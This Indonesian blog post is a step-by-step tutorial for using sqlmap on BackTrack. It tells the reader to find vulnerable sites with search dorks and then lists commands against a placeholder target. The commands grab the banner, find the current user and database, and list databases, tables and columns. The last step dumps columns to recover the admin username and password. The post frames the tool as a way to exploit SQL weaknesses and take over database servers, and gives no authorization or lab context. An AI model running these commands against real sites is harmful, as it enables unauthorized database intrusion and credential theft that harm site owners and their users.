cara menggunakan sqlmap di backtrack

Kali ini saya ingin menjelaskan cara penggunaan sqlmap pada backtrack, berawal dari sebuah website saya memplajari sqlmap nah lansung saja ahk dari pada berlama lama oh iyya sqlmap ini di gunakan untuk mengexploitasi kelemahan SQL dan untuk mengambil alih server database.
nah lansung aja

Pertama yang dipersiapkan adalah situs yang vulnerable menggunakan dork

Masuk ke direktori sqlmap

Perintah: root@bt:~#  cd /pentest/database/sqlmap

Lalu jalankan perintah berikut

root@bt:~# ./sqlmap.py -u http://situs-target-yang-mempunyai-vuln.com/indexs.html?id=8 --random-agent --thread 10 --banner

   Hal yang dilakukan diatas adalah untuk mencari celah melalui banner yang ada dalam situs tersebut.

Selanjutnya mencari database dan pengguna terakhir dari web tersebut

root@bt:~# ./sqlmap.py -u http://situs-target-yang-mempunyai-vuln.com/indexs.html?id=8 --random-agent --thread 10 --current-user --current-db
    contohnya akan tampil seperti ini :
    [*] tarada >> database dari situs tersebut
    [*] admin@localhost >> admin situs tersebut

Lakukan injeksi pada database yang telah di pilih tadi

root@bt:~# ./sqlmap.py -u http://situs-target-yang-mempunyai-vuln.com/indexs.html?id=8 --random-agent --thread 10 --dbs

Setelah nama database di dapatkan masukkan perintah berikut untuk melihat isi tables pada database

root@bt:~#  ./sqlmap.py -u http://site_victim.com/indeks.html?staff_id=8 --random-agent --thread 10 -D nama_database --tables

Cari columns dari tables database tersebut.

root@bt:~#  ./sqlmap.py -u http://situs-target-yang-mempunyai-vuln.com/indexs.html?id=8 --random-agent --thread 10 -D nama_database --columns
Columns didapat, sekarang masuk ke column untuk mencari username dan password admin

root@bt:~# ./sqlmap.py -u http://situs-target-yang-mempunyai-vuln.com/indexs.html?id=8 --random-agent --thread 10 -D nama_database -C nama_columns --dump


nga selamat mencoba dan sekian dari saya mohon maaf bila ada salah2 kata

Newer Post Older Post

One Response to “cara menggunakan sqlmap di backtrack”